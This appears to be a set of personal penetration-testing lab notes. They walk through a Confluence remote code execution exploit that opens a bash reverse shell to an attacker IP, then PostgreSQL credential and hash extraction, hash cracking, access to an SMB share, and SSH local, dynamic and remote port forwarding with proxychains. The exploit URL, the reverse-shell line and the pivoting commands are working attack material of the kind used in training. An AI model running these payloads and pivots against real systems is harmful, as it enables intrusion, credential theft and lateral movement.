Edge Device IP (CONFLUENCE01): 192.168.110.63 SSH server IP (PGDATABASE01): 10.4.110.215 Target IP (HRSHARES): 172.16.110.217
Provided Attacker IP: 192.168.45.209
Enumerating the edge device, we identify a remote code execution vulnerability we can exploit to obtain a reverse shell.
On the attacker machine:
1. run nc -lnvp 4444
2. run the following curl command to initiate a reverse shell
curl -v <http://192.168.110.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.209/4444%200%3E%261%27%29.start%28%29%22%29%7D/>
1. Establish TTY functionality using python's pty module:
python3 -c 'import pty; pty.spawn("/bin/bash")'
2. Initiate the SSH connection to the server, and specify the ports we are trying to forward
ssh -N -L 0.0.0.0:5454:10.4.110.215:5432 database_admin@10.4.110.215
Forwarding traffic from local port 5454 to ssh server on port 5432
psql -h 192.168.110.63 -p 5454 -U postgres
> Using discovered password: D@t4basePassw0rd!
Enumeration:
1. \\l
2. \\c confluence
3. SELECT * from cwd_user
4. Extract all usrnames and their associated password hashes
5. Crack the hashes using hashcat (mode 12001 | Atlassian)
Discovered credentials:
hr_admin: Welcome1234
rdp_admin: P@ssw0rd!
database_admin: sqlpass123
ssh -N -L 0.0.0.0:4545:172.16.110.217:445 database_admin@10.4.110.215
smbclient -L //192.168.110.63 -p 4545 -U hr_admin --password Welcome1234
> Identify a /scripts share
smbclient //192.168.110.63/scripts -p 4545 -U hr_admin --password Welcome1234
> Initiate connection to the /scripts share
Enumerating the share, we eventually find our flag
ls -la, get provisioning.ps1; exit; cat provisioning.ps1
SSH Dynamic Port Forwarding
Run on the SSH client:
ssh -N -D 0.0.0.0:<Listening Port> <username>@<SSH server IP>
Now that the destination socket is dynamically assigned, we need to configure proxychains to facilitate the forwarding of traffic. After installing proxychains, we need to configure the proxy in /etc/proxychains.conf
Append: socks5 <proxy IP> <proxy Port>
Now on the attacker machine, we can run commands as if we are on the proxy machine, as long as we include the command proxychains at the start of the statement.
Because inbound traffic is much more restricted compared to outbound traffic, we may not always be able to SSH directly into a network and port forward from there.
Which is why we perform remote SSH port forwarding, by initiating a SSH connection to our attacker machine, we are able to bind a listening port on our attacker machine to an internal address accessible via the SSH client.
With the listening port bound to the attacker machine, the SSH client is now responsible for forwarding traffic.
Ensure the SSH is running on the attacker machine
Run on the SSH client:
ssh -N -R 0.0.0.0:<Listening Port>:<Target IP>:<Target Port> kali@<attacker IP>
Verify with: ss -ntplu
Now commands can be ran with the target IP being the attacker’s localhost, and it will be redirected to the specified target IP and Port
Like SSH Dynamic Port Forwarding, we are implementing the dynamic aspect to our SSH Remote Port Forwarding attack.
Ensure the SSH is running on the attacker machine
Run on the SSH client:
ssh -N -R <attacker listening Port> kali@<attacker IP>
Verify with: ss -ntplu
Like SSH Dynamic Port Forwarding, we will need proxychains to facilitate the forwarding of traffic. After installing proxychains, we need to configure the proxy in /etc/proxychains.conf